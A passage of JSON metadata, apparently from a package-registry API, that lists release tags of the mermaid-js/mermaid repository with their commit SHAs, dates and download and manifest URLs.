/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos